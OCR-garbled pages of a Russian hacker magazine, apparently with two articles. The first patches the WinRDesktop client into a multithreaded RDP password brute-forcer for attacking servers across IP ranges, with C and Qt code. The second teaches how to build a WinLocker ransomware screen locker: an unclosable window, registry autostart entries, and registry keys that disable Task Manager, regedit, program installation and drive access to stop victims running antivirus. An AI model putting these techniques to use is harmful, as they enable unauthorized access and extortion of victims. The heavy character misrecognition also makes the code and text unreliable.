забито. Спустя несколько месяцев я наткнулся на рибп. 
сот на ѵѵіпВОезкІор — порт гбезкіор’а на ѴѴіпбоѵѵз, в виде 
проекта для М5 Ѵізиаі Зіибіо. Это было именно то, что мне 
нужно, и я принялся за превращение безобидной софтин- 
ки в убойный брутфорс. 

Для начала нам необходимо определиться, как именно 
будет выглядеть наша прога. Рассмотрев множество вари- 
антов, я остановился на одном — брутфорс состоит из двух 
частей: 

1. Модифицированный ѵѵіп гбезкіор, которому передаются 
логин, пароль и ІР сервера. Он пытается залогиниться и 
возвращает результат. 

2 . 6111 — фронт-энд, который управляет всем этим добром: 
вводит многопоточность, позволяет сканировать диапазо- 
ны ІР, обеспечивает работу ІСО-бота. 6111 будет написан 
на С++ с фреймворком СИ:. 

Наверное, у тебя возник вопрос по поводу бота — а как 
же мы реализуем его, если реально рабочие компоненты 
для ІСО есть только под ОеІрЫ/ВСВ? Открою небольшой 
секрет — существует 01-класс 005САР для работы с ІСО 
(написанный, кстати говоря, мною], и находится он на 
цозсаг.доодіесобе.сот. В этой статье не рассматривается 
написание бота, там все предельно просто, и ты (я наде- 
юсь) в состоянии разобраться с этим вопросом сам. 

Все, лирическое отступление в сторону, начинаем кодить! 

РЕѴЕШРЕРЗ, 0ЕѴЕЮРЕК5, йЕѴЕЮРЕРЗ! 

Для начала мне потребовалось найти исходники 
ѴѴіпПОезкІор’а. Задача была не из легких, и я убил 
полдня, чтобы разобраться, как же скачать их с одного 
"РиОІЧ". Далее я нашел патч, превращающий Вбезкіор 
в брутфорс. Но у нас-то не Вбезкіор! Не беда — про- 
патчим софтинку руками. Запускаем Ѵізиаі Зіибіо 2008 
(пойдет и ѴС++ 2008 Ехргезз, но Ргоіеззіопаі имеет 
более крутой компилятор, поэтому советую использо- 



вать именно его, тем более, если ты студент — можешь 
получить его бесплатно по ОгеатзРагк, и открываем 
наш проект. Проект изначально предназначен для ѴС 9, 
поэтому без плясок с бубном в версиях моложе Ѵ52008 
он не заработает. 

Сначала добавим несколько констант в файл 
гбезкіор. б, которые помогут программе распознавать 
результат ввода пароля. Кстати говоря, в патче есть 
функция брутфорса серверов под ѴѴіп 2 к, но он исполь- 
зует четвертую версию протокола, которая не поддер- 
живает автологин, поэтому пасс вбивается эмуляцией 
кнопок. Нас такое не устраивает, так что ѴѴіп 2000 мы 
поддерживать не будем. 

Как же работает распознавание? Очень просто — при- 
шедший клиенту пакет побайтово сравнивается с некото- 
рыми сигнатурами, и на основании этих сигнатур делается 
вывод об успехе/неудаче при подборе пароля. Например, 
#бе!іпе Ю0ОМ_А1ЯН_РАИЕО»\х1е\хОО\хОО» означает, что 
пароль был введен неправильно. Остальные константы ты 
можешь подглядеть в коде на диске. 

Значение констант должно быть понятно из названия. 

Если нет, то зачем ты это читаешь? :) 

Далее мы патчим процедурку ргосез5_1ех12(] из файла 
огбегз.с. В ней-то и происходит распознавание резуль- 
тата ввода пароля. Хотя, на самом деле, не только в 
ней — зачастую при успешном логине сервер при- 
сылает пакет с сообщением об этом — Р0и_Е060І\І. 

ПОСМОТРИМ КОД: 

Кусок ргосе55_1ех12() 

іі ( !тетстр(оз->РехР, ЬООО^АШ?Н_РАІЬЕВ , 3)) 
ЕхіСРгосезз (2 ) ; 

іі ( ( ’тетстр (оз->РехР , ЬОС(Ж_МЕЗЗАСЕ_ЕАІЕЕВ_ 
ХР, 18)) И ( Ітетстр (оз->РехР , ЬОС(Ж_МЕ38АСЕ_ 
ЕАІЬЕВ_2КЗ, 18))) 

ЕхіРРгосезз (3 ) ; 

Этот код нужно вставлять в самом начале процедуры. 
Поясню его действие. 




НТТР://ѴѴѴШ 

■ г 

> Ипкз 

Іогит.азесбка.ги — 

Крупнейший форум 
про ІСО 

ах-зоіі — Весь 
мой софтты можешь 
найти там 

ді.покіа.сот — Офи- 
циальный сайт 01 




> ѵѵагпіпд 

Используй брутфорсы 
только для аудита 
безопасности соб- 
ственных серверов. 

В случае использова- 
ния их в противоза- 
конных целях, 
ни автор, ни редак- 
ция ответственности 
за твои действия не 
несут. 




> СІѴСІ 

Исходники ты мо- 
жешь посмотреть 
на нашем диске 




> іпіо 

Если интересно про- 
должение работы 
с ВОР или 01 — пиши 
мне на мыло, я как 
раз сейчас переношу 
Вйезкіор на 01 
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ѵѵіпВОезкІор в Ѵізиаі Біисііо 2008 



ргосе55_1:ех1:2(] обрабатывает пакет, в котором приходит текст от серве- 
ра (что очевидно из его названия], в нем мы сравниваем полученный 
тексте некоторыми заранее известными последовательностями при 
Іодоп’е. Последний шаг — открываем гбр.с и ищем процедуру ргосез5_ 
ба!:а_рби(). В ней нас интересует кусок кода, начинающийся с «сазе 
НОР_ОАТА_РОи_І_О0ОІ\І:». Просто вставляем ЕхііРгосезз(4] после нее. 
Зачем нам нужен ЕхііРгосеззО — читай далее. 

Так, с корректировкой ѵѵіпРбезкІор’а мы с тобой разобрались. Если 
ты думаешь, что самое сложное позади — ты глубоко заблуждаешься. 
Самое сложное еще впереди. 

Первая проблема, с которой мне пришлось столкнуться — это появле- 
ние окна приложения при запуске. Нам оно не нужно, поэтому смело 
делаем ЗбоѵѵѴѴіпбоѵѵ с параметром 5ѴѴ_НЮЕ. 

Вторая проблема — как же брутфорсу общаться с внешним миром, 
как он будет сообщать нам о результате проверки? РгіпШ) и прочее 
не работают, в файл писать — это не круто. Наиболее простой и в 
то же время надежный метод — завершать приложение с разными 
ЕхКСобе’ами. 

Например, ЕхМ:Ргосезз(4] будет вызываться при правильном пароле, 
ЕхМ:Ргосезз(2] — при неправильном, а ЕхііРгосеззіЗ) — при неудачной 
попытке подключения. Сказано — сделано (результат ты можешь уви- 
деть в ргосезз_1;ех1:2(] на врезке]. 

Третья проблема, ее мне так и не удалось решить — нефиговое потре- 
бление ресурсов. Забегая вперед, скажу, что 30 потоков грузят на 
100% процессор моего М5І ѴѴіпб и90. Связано это с распаковкой бит- 
мэпов (РОР-сервер сильно сжимает картинки]. Я вырезал все (на мой 
взгляд] ненужные куски кода с распаковкой и рисованием на форме 
(зачем рисовать на форме, если мы ее не видим?], что позволило 
немного снизить ресурсопотребление, но проблему это все равно не 
решило. Если ты — крутой кодер на С, и тебе удастся снизить аппетит 
распаковщика, не забудь сообщить мне об этом :). 

Четвертая, и последняя, проблема — отсутствие каких-либо симво- 
лов, кроме английского алфавита и цифр. Научить брутфорс понимать 
кириллицу мне так и не удалось, хотя, может быть, оно и к лучшему — 
брутить русские сервера не стоит :). 

БРУТУ — ГУЙ! 

В принципе, брутфорс уже готов, но он однопоточный — так же, как и 
брут от теіаі’а. Можно, конечно, писать батники для запуска брута, но 
мы же крутые хакеры, мы хотим брутить дедики десятками в день, и 
поэтому выход у нас один — написание фронт-энда. 

В качестве инструмента я выбрал... нет, не модный ныне С#, а 
свой любимый (и гораздо более перспективный, на мой взгляд) СИ: 
Егатеѵѵогк. В ][ уже не раз писали о нем, поэтому не вижу смысла 
описывать все его достоинства. Далее я подразумеваю, что ты уже 
умеешь работать с этим фреймворком. Если нет — советую почитать 
официальную документацию СИ на дЕпокіа.сот и в обязательном 
порядке — книгу Саммерфилда и Бланшета (работники СИ ВоНѵѵаге, 



один из них как раз занимается документацией, так что книжка 
шикарна]. 

Запускаем 01 Сгеаіог (советую использовать зпарзбоСы — они не 
более глючные, чем зіаЫе-версии, но более удобные, и содержат все 
грядущие нововведения). Итак, создаем новый 0111-проект с одним 
виджетом. Дизайн — личное дело каждого, на скриншоте ты можешь 
увидеть то. что получилось у меня. 

Для начала — набросаем небольшой план. 

1. Главный поток запускает вспомогательный поток. 

2. Вспомогательный поток запускает .ехе-шник, который мы написали 
ранее, и ждет результата. 

3. Когда выполнение брутфорса заканчивается, поток испускает сиг- 
нал, который обрабатывается главным потоком, берет следующие 
логин и пароль, и переходит к шагу 2. 

Для вспомогательных потоков я написал класс ВгиІеТЬгеасІ, который, 
по сути, не является потоком, поскольку не наследуется от ОТЬгеаб, 
но использует только асинхронные методы для выполнения действий, 
занимающих продолжительное время. ВпЛеТЬгеасІ занимается запу- 
ском нашего модифицированного ѵѵіпВОезкІюр’а с помощью объекта 
ргосезз класса ОРгосезз. Класс ОРгосезз создан для запуска внешних 
приложений, и может запускать приложение, направлять его вывод в 
консоль (то, что выводится через ргіпіЧ или соиі, например), отслежи- 
вать изменение состояния и завершение процесса. Нас интересуют 
только запуск и завершение приложения — если происходит одно из 
этих событий, испускаются сигналы ѵоіб зіа г1:есІ О и ѵоіб ГіпізЬесКіпІ: 
ехКСобе) соответственно. Обрати внимание на последний сигнал — в 
нем в качестве параметра передается код, с которым приложение 
было завершено — и этот параметр нам очень сильно пригодится. 
Обрабатывать мы будем только второй сигнал, и код слота ты можешь 
увидеть на врезке «Сигнал опЕіпізЬебО». 

В нем поток испускает соответствующие сигналы, и переходит к сле- 
дующей комбинации логищпароль. 

Сам запуск процесса выглядит вот так: 

Запуск процесса брута 

ОЗСгіпдЬізЦ зІАгдз; 

зІАгдз « "-и" « зІЬодіпз . аС ( іСиггепСЬодіп) 

« " -р" « зІРаззѵтогсіз . аС ( іСиггепЦРаззтлгогсІ) 

« зЗегѵег; 

ргосезз . зСагС («зѵсКозЦ . ехе», зІАгдз) ; 
іСиггепЦРаззѵ\гогс1++ ; 

Как видишь, аргументы процессу передаются в СЗітіпдизІ:, что очень 
удобно :). 

Ну и, конечно же, не забудь в конструкторе класса сразу присоединить 
сигнал к слоту: 

СЮЬз есС : : соппесС ( &ргосезз , ЗІСЫАЬ ( ^іпізКесі ( іпС ) ) , 

Йіз, ЗЬОТ (опРіпізКесі ( іпС ) ) ) ; 
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СлотопБегѵегРезиІІІ) в 01 Сгеаіог 



Вот так выглядит слот главного потока, обрабатывающий результаты: 

Обрабатываем результаты в главном потоке 

іі ( іКезиІі == 0 ) 

{ 

ІС 006 ++ ; 
іСЬескеб++ ; 

шгііеКезиІі (ОЗігіпд ( " %1 : %2 ; %3 " ) . агд ( зЗегѵег 
) . агд ( зЬзег) . агд ( зРаззмогб) , " доосі . іхі " ) ; 

озсаг . зепбМеззаде ( зеіііпдз . ЪоіМазіег ( ) , 

ОЗігіпд ( " %1 : %2 ; %3 " ) . агд ( зЗегѵег) . агд ( зЬзег ) 

. агд ( зРаззмогб) ) ; 
іі: ( ігауісоп . ізѴізіЫе ( ) ) 

ігауісоп . зіюмМеззаде ( "Сооб" , 

ОЗігіпд ( " %1 : %2 ; %3 " ) . агд ( зЗегѵег ) . агд ( 
зЬзег) . агд (зРаззмогб) ) ; 

} 

еізе 

іі ( ІКезиІі == -1 ) 

{ 

ІВас 1 ++ ; 
іСЬескес1+ + ; 

} 

РОМЕ! 

Вот и все! Остальное ты должен доделать сам, а если не сможешь 
— смело гляди в мои исходники на диске. Только не надейся, что 
сможешь открыть проект, поменять названия кнопочек и заработать 
на Хаммер, продавая новый брут — в нем есть несколько элементар- 
ных уловок, и, если ты скрипт-кидди, то скомпилить проект у тебя 
не получится. Ну, а если умеешь хотя бы базово работать с С, то, я 
думаю, проблем оно тебе не доставит :]. 

К данному решению я пришел после массовой перекомпиляции моего 
В&О Р ВгіКе, после выкладывания его исходников, школотой (не 
путать со школьниками!), которые при малейших проблемах соверша- 
ли действия сексуального характера с моим мозгом («А у меня не та 
версия тзІзсах.сИІ, что делать??», «А что значит ЗЬоѵѵМеззадеО???»). 
Один из индивидуумов, кстати, сам признался, что Ьгаіп.сШ и ЬапсІз.ІіЬ 
у него отсутствуют (спасибо ззІВоІ: за лог, поржал от души). Ну, да мы 
отвлеклись. 

Итого у нас остались нерешенными две проблемы, устранение которых 
я поручаю тебе: 

1) Потребление ресурсов. 

2) Поддержка кириллицы (чисто спортивный интерес, еще раз повто- 
ряю — не бруть русские сервера). 

На этом позволь откланяться. Удачного кодинга!^с 



Сигнал опРіпі$ИесІ() 



іі ( ехііСобе > ббб ) 

{ 

ешіі опЗегѵегКезиІі ( зЗегѵег , 
зІЬодіпз . аі ( ІСиггепіЬодіп) , 
зІРаззмогсІз . аі ( іСиггепіРаззмогсІ-1 ) , 
ехііСобе) ; 

ешіі опЬопеЗегѵег ( іЬіз ) ; 

геіигп; 

} 

зміісЬ ( ехііСобе ) 

{ 

сазе ббб: // Ошибка 

ешіі опЬопеЗегѵег (іЬіз ) ; 
геіигп; 

сазе 0: // Фиг знает 

ешіі опЗегѵегКезиІі ( зЗегѵег , 
зІЬодіпз . аі ( ІСиггепіЬодіп) , 
зІРаззмогсІз . аі ( ІСиггепіРаззмогсІ- 1 ) , 
ігие) ; 

іі ( ЪЗкірБего ) 

{ 

ешіі опЬопеЗегѵег ( іЬіз ) ; 
геіигп; 

} 

Ьгеак; 

сазе 4: // Гуд ! 

ешіі опЗегѵегКезиІі ( зЗегѵег , 
зІЬодіпз . аі ( іСиггепіЬодіп) , 
зІРаззмогсІз . аі ( ІСиггепіРаззмогсІ-1 ) , 
0 ) ; 

ешіі опБопеЗегѵег (іЬіз ) ; 
геіигп; 

сазе 5 : // Тоже Гуд 

ешіі опЗегѵегКезиІі ( зЗегѵег , 
зІЬодіпз . аі ( ІСиггепіЬодіп) , 
зІРаззмогсІз . аі ( ІСиггепіРаззмогсІ-1 ) , 
0 ) ; 

ешіі опЬопеЗегѵег ( іЬіз ) ; 
геіигп ; 

беіаиіі: // Бэд 

ешіі опЗегѵегКезиІі ( зЗегѵег , 
зІЬодіпз . аі ( ІСиггепіЬодіп) , 
зІРаззмогсІз . аі ( ІСиггепіРаззмогсІ- 1 ) , 
- 1 ) ; 

Ьгеак; 

} 

пехіРаззмогс! ( ) ; 
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ТКОЖШЮСК 



ЗТАІЧОАРО РОРТАВСЕ ТУ РЕѴѴВІТГГ? 



тко^ы.эді^ьоск 



сіІ5к:ВШКВ; 

Ьедіп 

сазе Мзд.№Рагаш оТ 



ЗАЩИЩАЕМ ПЕРСОНАЛЬНЫЙ КОМПЬЮТЕР ОТ 
НЕОСТОРОЖНЫХ ДЕЙСТВИИ ПОЛЬЗОВАТЕЛЯ 



Не секрет, что многие пользователи настолько далеки от 
информационных технологий, что допускать их к работе за таким 
сложным устройством, как ЗВМ, чревато. Но как организовать 
ограничение доступа к ПК? Ведь включить компьютер нынче может 
любой, у кого хотя бы на 10% руки растут из плеч. К счастью, существует 
целый класс программ, помогающий ограничить пользователю доступ 
к различным компонентам операционной системы: от простого запрета 
играть в Косынку или Сапера, до полной блокировки ѴѴіпсІоѵѵз. 



КАК ПРОИСХОДИТ ЗАРАЖЕНИЕ? 

Однако не все пользователи соглашаются на добровольную блокиров- 
ку своей системы (хочу сконцентрировать твое внимание на том факте, 
что в этой статье мы не станем рассматривать создание вредоносного 
ПО]. Так вот, нередко подобный софт доставляется на их машины в 
виде вируса. Способов заразить жертву чрезвычайно много. Среди 
них наибольшей популярностью пользуются: 

1. БАГИ БРАУЗЕРОВ. Ни для кого не секрет, что одна из 
целей современного вирусописателя — браузер пользователя. 
Полезных ѵѵеб-сервисов пруд пруди, и пользователи, конечно 
же, ими пользуются. Для многих браузер — самая часто исполь- 
зуемая программа, которая очень редко закрывается (у меня так 
вообще не закрывается]. 

Не надо ходить к гадалке в поисках ответа на вопрос «через какую 
дверь лучше всего прорваться в систему пользователя?». Тут и так 
ясно: необходимо использовать уязвимости самых популярных брау- 



зеров. Чтобы применить этот способ, не нужно обладать особым 
интеллектом. Достаточно пошерстить по зесигТу-сайтам, найти (если 
он есть] подходящий сплоит и красиво оформить его для своих нужд. 
Быстро, просто и бесплатно. 

2. РБА5Н. В последние месяцы компания АбоЬе регулярно лажает. 
Не успеют они выпустить новую версию і'ІазЬ-плеера, как хакеры 
умудряются обнаружить в нем критическую уязвимость. Находят, 
тыкают разработчиков носом, а те не спешат их исправлять. 

Глупо полагать, что в это же время вирмейкеры будут тихо сидеть 
на пятой точке и ждать, когда же залатают багу. Они постоянно 
пытаются использовать в корыстных целях свежую уязвимость и 
выжать из нее максимальную выгоду. В результате получается, что 
после просмотра тобой забавного ролика система начинает вести 
себя странно. 

3. ПОЛЬЗОВАТЕЛЬСКАЯ НАИВНОСТЬ. Когда я начал готовить эту 
статью, ради эксперимента загрузил ОС в виртуальной машине 
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ѴШОѴѴЗ АРІ 



НЕЗАКРЫВАЕМОЕ ОКНО 



мс . сЬЗіге : = зІ2ео1: (ѵ?с ) ; 

мс . зкуіе : =сз_Ьгесігам ог сз_ѵгесІгаѵ7; 

ѵіс . ІркпУ/псІРгос : = @Міпс1омРгос ; 

ѵіс . сЪСІзЕхкга : =0 ; 

мс . сЪШЙЕхкга : = 0 ; 

мс . Мпзкапсе : =НІпзкапсе ; 

мс . Ысоп : =Ъоас1Ісоп ( 0 , іс!і_арр1ісакіоп) ; 

мс . ЬСигзог : =Ъоас1Сигзог ( 0 , ісІс_аггоѵ7) ; 

мс . ЫогВаскдгоипсІ : =СОЬОК_ВТРЕАСЕ+1 ; 

мс . ІрзгМепиЫаше : =пі1 ; 

мс . ІрзгСІаззЫаше : = ' ѵ7Іп_шаіп ' ; 

КедізкегСІаззЕх Ыс ) ; 

ІеккРоз : =2 0 ; 
корРоз : =0 ; 

ѴУІпйоѵѵѴУісІкІі : =3сгееп . Ѵ7ісЗ_1аЬ_ ; 

ЭДіпсІоШеідЬк : =3сгееп . Неідкк ; 

МаіпМпсІ: =СгеакеѴ\Ііпс1о\лгЕх ( 

0, 

'ѵ7Іп_таіп' , 

' кезк ' , 

мз_оѵег1аррес!міпсіом , 

ІеккРоз , 
корРоз , 
ѵііпйоѵіѴЛйЫі , 
міпсІомНеідкік , 

0, 

0, 

Ніпзкапсе , 
піі 
) ; 



ЗекНіп&О^Ьопд (МаіпМпсІ, ОНЬ_НШГОРАКЕІЯТ , 
ОекЕезккорѴ7іпсіоѵО ; 

ЗекМпйомРоз (МаіпШсІ , НШГО.ТОРМОЗТ , 

0, 0, 0, 0, ЗИР_ШМОѴЕ ог 5ШМГОЗІ2Е); 

ЗЬоілг^іп(іощ{МаіпШ<3. # СтдЗЪ-Оѵт) ; 

Шіііе СекМеззаде (Мезд, 0 , 0 , 0 ) йо 
Ьедіп 

ТгапзІакеМеззаде (Мезд) ; 

ЕізракскМеззаде (Мезд) ; 
епсі; 



и попробовал побродить по «сомнительным» сайтам. 

Не поверишь, но я умудрился три раза подхватить 
ѴѴі п Іоске г, согласившись на установку «последней вер- 
сии» казб-плеера и «специальных» кодеков. Честно 
говоря, я был немного в шоке, так как думал, что подоб- 
ные способы уже не катят. 

НА ЧЕМ БУДЕМ КОДИТЬ? 

Я долго размышлял над тем, на каком языке писать при- 
меры к этой статье, и решил вспомнить проверенный 
временем ОеІрЬі. «Так у тебя же ехе’шник получится под 
мегабайт!», возразишь ты. Отчасти твоя правда, но эту про- 
блему мы решим еще на стадии зачатия проекта. Весь код 
будет приведен на чистом АРІ. Соответственно, наш зверек 




А V АТ А К 



ГТІ5СІП 



Реѵе Еорег Омівг 

Ноте Щьгагу I Цвет 



В тзсіп можно найти ответ на любой вопрос 





> ѵѵагпіпд 

Написание вирусов — 
уголовно- наказуемое 
преступление. Мы 
намеренно допустили 
в коде в этой статье 
несколько незна- 
чительных ошибок, 
благодаря которым 
в руках злобных 
ламеров он работать 
не будет. Более- 
менее продвинутый 
программер в нем 
разберется. 



в скомпилированном виде будет весить менее 100 Кб. Еще 
пару десятков кило мы сбросим за счет манипуляций архи- 
ватором байт-кода над полученным бинарником. 

ОСНОВА ЛЮБОГО ШЮСКЕР’А 

Фундамент любого ѴѴіпІоскег’а — форма, растянутая почти 
на весь экран. Причем это не просто большая форма, 
а окно, которое собой перекрывает все остальные и 
совершенно не слушается никаких команд. Ни свернуть, 
ни изменить размер, ни уж тем более завершить про- 
цесс программы. На первый взгляд может показаться, 
что вирусописатели изобрели ноу-хау, но в реале все 
намного проще. По факту, это самое обычное окно, для 
которого установлен стиль отображения «поверх всех». 
Чтобы окно вело себя как партизан и не реагировало 
на просьбы юзера, разработчики слегка модифицируют 
процедуру обработки сообщений извне. 

Модификация сводится к банальной обработке сообщения 
ѴѴМ_5Ѵ5С0ММАІ\Ю. Если быть еще точнее, то в процедуре 
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ССЮІЫб 



Внниэнн&і Гпіэтоі $*С*1ГПу Обнаружил вредоносное ПО на вашем црмпыотере. 




Осталось времени 02:48:55 





и гвдпы‘*‘* 1 * «« Г»1 юмцт <1 шршпь иі ЯМЗ 

кягеб-мэоа -* -***;■ мео 

. им%іші } | Лаш рціРІМТн і 







В с інэи о гювышсчым урыман рвспо ростр інсння пирате*»!* кміий Міегоаыі Юпйаім корпорация 
МіС№івП мепв новую систему зйіінгм своего программного <?« «печен**, с и шью оСессзечеіміі 
аеійистпостн г впіъюпате гм И н защиты от нееаннцм а нцрО ванного проішнноИення я систему череі 
уоэ&нмые места. 

На оасіем «аѵііьніоре обнаружена н* лицензионная иереи» МіетеюП штвожж. С метена был* 
івбм&ккрвоші. ДЛЯ раз С-п винра пкн и ■ГГНвацнн отправь Та Сѵс, 




Для активации у вас есть 24 часа с момента блокировки. 

В противном случае ваша система МІшкоА ШІлгіот 
Будет автоматически удалена. 



Іу Тк.ігіті чг гаѵ-і ти 



Галерея винлокеров 




70 рорт, 

ѴѴіпбоѵѵв заблокирован 




(см. врезку] обработки полученных сообщений нужно всего лишь объя- 
вить проверку на сообщение ѴѴМ_5Ѵ$С0ММАЫ0. Самое смешное, что 
в обработке этого сообщения можно вообще не писать код — форма и 
так перестанет реагировать на события внешней среды. 

АВТОСТАРТ 

Вирус должен загружаться вместе с операционной системой. 
Существует несколько способов обеспечить своей программе авто- 
загрузку. Условно их можно разделить на две группы: простые и про- 
двинутые. На рассмотрение продвинутых не хватит места в статье, 
поэтому рассмотрим лишь простые, основанные на использовании 
реестра. Итак, в реестре есть несколько уголков автостарта: 

1. НКІМ\$оЙѵѵаге\Місго50Й\ѴѴіпбо\л/5\Сиггеп1:Ѵег5Іоп\Ніт — отсюда 
стартуют программы, запускаемые при входе в систему любого юзера. 

2 . НКСП\5оЙѵѵаге\Місго50Й\ѴѴіпсІо\л/5\Сиггеп1:\Ѵег5Іоп\Нип — место, 
аналогично предыдущему, за исключением того, что отсюда грузятся 
программы текущего пользователя. 

3. НКЬМ\5оЙ\л/аге\Місго50Й\ѴѴіпбо\л/5\Сиггеп1:Ѵег5Іоп\Нип5егѵісе5 — 
список программ, запускаемых до входа пользователей в систему. 

4 . Н КІМѴЗобІѵѵа ге\М ісгозобіУѴѴі псІо\л/5\Си ггеп1;Ѵег5Іоп\роІісіез\ЕхрІогег\ 
Пип — этот раздел реестра отвечает за старт программ, добавленных 
в автозагрузку через групповые политики. 

5 . НКЬМ\5оЙ\л/аге\Місго5о!і\ѴѴіпсІо\л/5 ЫТ\Сиггеп1:Ѵег5Іоп\ѴѴіпбоѵѵ5 — 
еще одно место, содержащее список программ, загружаемых вместе 
с ѴѴіпбоѵѵз. 

6. КНІМ\5оЙѵѵаге\Місго50іі\ѴѴіпсІо\л/5 І\ІТ\Сиггеп1:Ѵег5Іоп\ѴѴіпІодоп — в 
этой ветке указывается ссылка на винлогон, но ничто не мешает ука- 
зать и путь до своей программы. 

7 . Папка автозагрузки. Пожалуй, самый примитивный способ, но тем 
не менее, многие в и русо писатели им пользуются. 

Какое из предложенных мест автозагрузки выбрать для своего 



творения? Точного ответа нет, но крайне не рекомендуется ставить 
все на какой-то один их предложенных вариантов. Куда лучше 
использовать комбинацию, то есть прописываться сразу в несколь- 
ко мест. Пример записи в автозагрузку на ѴѴіпАРІ приведен во 
второй врезке. 



ФЛЕШКИ 



ѵаг 

йізк: ОШШЭ; 

Ьедіп 

сазе Мзд.КРагаш об 

БВТ_БЕѴІСЕАККІѴАЬ : //Если подключили флешку 

іі ( РЬЕѴ_ВК0АВСА8Т_НВК (Мзд . ЬРагаш) А 
. с!ЬсЬ_с1еѵісеЬуре = ЬВТ_ВЕѴТУР_ѴОЬЦМЕ) ЬЬеп 
Ьедіп 

//Пытаемся определить букву диска 

Ьізк : = РВЕѴ_ВК0АЬА8Т_Ѵ0ЫМЕ (Мзд . ЬРагаш" " ) л 

. бЬсѵ_ипіЬшазк; 

//Выполняем свой зловредный код 
епб; 

ЬВТ_ЬЕѴІСЕКЕМОѴЕСОМРЬЕТЕ : //Если флешку извлекли 

Ж (РЬЕѴ_ВКОАЬСАЗТ_НЬК (Мзд. ЬРагаш) А 
.ЬЬсЬ_беѵісеЬуре = ЬВТ_ЬЕѴТУ Р_ѴОЫШЕ ) ЬЬеп 
Ьедіп 

//Флешку отмонтировали 
епб; 
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Операция отменена вследствие действующих для компьютера ограничений. Обратитесь к администратору сети. 



йтавіе: 



ѴѴЕВ-СЕРВЕР 



Ьіж^С : аггау [0..1024] оі сЬ.аг; 

_гедиезЕ : зЕгіпд; 

_Еетр: зЕгіпд; 

_раЕІі: зЕгіпд; 

_Рі1еЗЕгеат : ТРіІеЗЕгеат; 

Ьедіп 

Ресѵ (_с1іепЕ , _ЬиРР, 1024, 0); 

_гедиезЕ : =зЕгіпд (ЩзиЕЕ ) ; 

_раЕІі := ОеСРіІеРаЕЪ. (Сору 
(_гедиезЕ, 1, роз (#13, _гедиезЕ) ) ) , 
_раЕЪ. := КерІасеЗІазЪ. (_раЕІі) ; 



ок 



Результат блокировки 



I Диспетчер задач 


*1І 


Диспетчер 

[ 


задач отключен администратором. 


Г" 6к ]| 





ленного приложения. Практически все операции, которые выпол- 
няются через эту оснастку, изменяют определенные ключи реестра. 
Если ты умудришься разузнать, какие именно ключи реестра моди- 
фицируются, то без проблем сможешь изменять их прямо из своей 
программы. Как это сделать? Существует два варианта: применить 
метод научного тыка, или воспользоваться утилитой РгосеззМопіІюг 
от Марка Руссиновича. Второй способе явно круче, поэтому советуем 
скачать утилиту и приступить к исследованиям. 



Щ ( (_раЕІі = 1 1 ) ог (_раЕЪ. = 1 \ 1 ) ) ТЬеп 

_раЕІі := РосшпепЕКооЕ + 'X 1 + РігесЕогуІпсІех ; 

{ еізе 

іі ( (_раЕІі [ ІепдЕІі (_раЕІі) ] ='\ 1 )) ТЧтеп 

_раЕЪ. : = РосшпепЕКооС + 1 \ 1 + 

РігесЕогуІпсІех; } 

і! ( РіІеЕхізЕз (_РаЕЕ0 ) ТЬеп 
Ьедіп 

_Рі1е5Егеат := 

ТРіІеЗЕгеат. СгеаЕе (_РаЕЬ., ІшОрепКеаЬ) ; 



РЕДАКТОР РЕЕСТРА 

Большинство пользователей привыкли редактировать реестр 
с помощью встроенного в ѴѴіпбоѵѵз редактора реестра гедебіЕ 
Поскольку наш вирус будет вносить изменения в реестр, нам 
необходимо не допустить ковыряний в реестре со стороны нера- 
дивого пользователя. Нечего ему совать свой любопытный нос 
куда не следует. Решить эту задачу проще всего путем блокировки 
запуска редактора реестра. Чтобы выполнить блокировку, доста- 
точно создать ключ ВізаЫеРедізІхуТооІз со значением 1 в ветке 
Н К Е Ѵ_С Ь В Р Е N Т_Н 5 Е В\5 о ііѵѵа ге\ М і с го з о іі\\/Ѵ і п б оѵѵз\С и г ге п 1: Ѵе гз і о п\ 
РоІісіез\5уз1ет. 



ЗепШЗЕг (_С1іепЕ , 'НТТР/1.0 200 ОК 1 ) ; 

ЗепсІЗЕг (_С1іепЕ , 1 Зегѵег: хЗгѴ 1 ); 

ЗепсІЗЕг (_С1іепЕ , 1 СопЕепЕ-ЬепдЕЪ. : 1 + 

ІпЕТоЗЕг (_Рі1еЗЕгеат . Зіге ) ) ; 

ЗепсІЗЕг (_С1іепЕ , 1 СопЕепЕ-Туре : 1 

+ СеЕТуреСопЕепЕ (_РаЕЬ) ) ; 

ЗепсІЗЕг (_С1іепЕ , 1 СоппесЕіоп: сіозе 1 ); 

ЗепсІЗЕг (_С1іепЕ , 1 1 ) ; 

ЗепЬРіІе (_С1іепЕ , _Рі1еЗЕгеат) ; 

_Рі1еЗЕгеат . Ргее ; 

РпЬ 

//Вырезано 

И ТЕБЯ ЗАБЛОКИРУЕМ, И МЕНЯ ЗАБЛОКИРУЕМ! 

Переходим к самой интересной части — блокировке системы поль- 
зователя. Перед тем как рассмотреть конкретные примеры объектов 
блокировки, я хочу поделиться с тобой одним советом. На основе 
него очень легко придумывать новые «пакости». Идея проста до без- 
образия. В профессиональных редакциях ѴѴіпбоѵѵз (те, которые Рго и 
выше] имеется редактор групповых политик дребіЕ С его помощью ты 
имеешь возможность создавать правила входа в систему и так далее. 
Например, ты запросто можешь назначить программу, которая будет 
запускаться после загрузки системы или заблокировать старт опреде- 



ДИСПЕТЧЕР ЗАДАН 

Все без исключения винлокеры, которые я видел, блокировали запуск 
диспетчера задач. Что ж, не станем от них отставать. Реализуется эта 
фича созданием ключа ОізаЫеТазкМдг (тип бѵѵогб] со значением 1 в 
той же самой ветке, где и ВізаЫеВедізІхуТооІз. 

УСТАНОВКА И УДАЛЕНИЕ ПРОГРАММ 

Особо мозговитые юзеры с помощью апплета «Установка и уда- 
ление программ» в случае заражения системы пытаются инстал- 
лировать антивирусы. Это легко пресечь, если создать ключ 
|\]оАббВетоѵеРгодгат5 со значением 1 (тип бѵѵогб] все в том же раз- 
деле, где и ВізаЫеВедізІхуТооІз. 

БЛОКИРУЕМ ДОСТУП «ДИСКАМ 

Чтобы полностью испортить пользователю настроение, можно 
вообще заблокировать доступ к присутствующим в системе 
дискам . Пусть юзер даже не пытается запустить антивирус 
со своей флешки! Реализуем этоттрик путем создания ключа 
ІХІоѴіеѵѵОпОгіѵе (бѵѵогб) в разделе НКЕУ_Е0САЕ_МАСН1ЫЕ\ 
ЗоЙѵѵаге\Місго5о^\ѴѴіпбоѵѵ5\Сиггеп1:Ѵег5Іоп\РоІісіе5\ЕхрІогег. В 
качестве значения для ключа указываем битовою маску блоки- 
руемого диска. Например, для диска С это будет 4. В случае, если 
требуется заблокировать несколько дисков, то их маски придется 
